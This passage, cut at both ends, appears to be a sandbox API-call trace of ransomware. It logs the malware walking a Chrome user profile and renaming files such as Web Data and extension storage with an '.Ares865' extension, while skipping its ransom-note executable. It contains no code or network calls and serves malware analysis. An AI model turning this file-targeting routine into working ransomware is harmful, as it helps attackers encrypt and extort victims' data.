dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.899] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20480) returned 1 [0099.902] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.Ares865") returned 102 [0099.903] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\top sites-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\top sites-journal.ares865"), dwFlags=0x1) returned 1 [0099.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\top sites-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.904] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.904] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.904] CloseHandle (hObject=0x0) returned 0 [0099.904] CloseHandle (hObject=0x118) returned 1 [0099.904] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88c2e920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x88c2e920, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x88c2e920, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x278, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TransportSecurity", cAlternateFileName="TRANSP~1")) returned 1 [0099.904] lstrcmpiW (lpString1="TransportSecurity", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.904] lstrcmpiW (lpString1="TransportSecurity", lpString2="aoldtz.exe") returned 1 [0099.905] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\TransportSecurity.Ares865") returned 102 [0099.905] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\transportsecurity"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\TransportSecurity.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\transportsecurity.ares865"), dwFlags=0x1) returned 1 [0099.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\TransportSecurity.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\transportsecurity.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.906] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=632) returned 1 [0099.914] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Visited Links.Ares865") returned 98 [0099.914] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\visited links"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Visited Links.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\visited links.ares865"), dwFlags=0x1) returned 1 [0099.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Visited Links.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\visited links.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.915] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131072) returned 1 [0099.925] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Data.Ares865") returned 93 [0099.925] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web data"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Data.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web data.ares865"), dwFlags=0x1) returned 1 [0099.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Data.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web data.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.927] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=69632) returned 1 [0099.933] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Data-journal.Ares865") returned 101 [0099.933] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web data-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Data-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web data-journal.ares865"), dwFlags=0x1) returned 1 [0099.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Data-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web data-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.935] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.935] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.935] CloseHandle (hObject=0x0) returned 0 [0099.935] CloseHandle (hObject=0x118) returned 1 [0099.935] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d608d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Data-journal", cAlternateFileName="WEBDAT~2")) returned 0 [0099.935] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.935] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c90 [0099.935] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications" [0099.936] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0099.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.Ares865") returned 155 [0099.936] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.ares865"), dwFlags=0x1) returned 1 [0099.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.938] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=167414) returned 1 [0099.951] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.Ares865") returned 159 [0099.951] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.ares865"), dwFlags=0x1) returned 1 [0099.952] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.953] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16) returned 1 [0099.958] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" [0099.959] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0099.959] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.Ares865") returned 152 [0099.960] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.ares865"), dwFlags=0x1) returned 1 [0099.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.961] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.961] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.961] CloseHandle (hObject=0x0) returned 0 [0099.961] CloseHandle (hObject=0x118) returned 1 [0099.961] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84254520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84254520, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84254520, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0099.961] lstrcmpiW (lpString1="CURRENT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0099.961] lstrcmpiW (lpString1="CURRENT", lpString2="aoldtz.exe") returned 1 [0099.962] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.Ares865") returned 149 [0099.962] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current.ares865"), dwFlags=0x1) returned 1 [0099.963] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.964] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16) returned 1 [0099.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.Ares865") returned 146 [0099.968] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock.ares865"), dwFlags=0x1) returned 1 [0099.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.970] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.970] CloseHandle (hObject=0x0) returned 0 [0099.970] CloseHandle (hObject=0x118) returned 1 [0099.970] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84254520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84254520, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x93935fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xc3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0099.970] lstrcmpiW (lpString1="LOG", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.970] lstrcmpiW (lpString1="LOG", lpString2="aoldtz.exe") returned 1 [0099.970] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.Ares865") returned 145 [0099.971] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.ares865"), dwFlags=0x1) returned 1 [0099.972] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.972] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=195) returned 1 [0099.975] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.Ares865") returned 157 [0099.975] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001.ares865"), dwFlags=0x1) returned 1 [0099.984] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.985] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41) returned 1 [0099.991] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage" [0099.991] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.Ares865") returned 163 [0099.991] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.ares865"), dwFlags=0x1) returned 1 [0099.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.993] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12288) returned 1 [0099.997] wsprintfW (in: 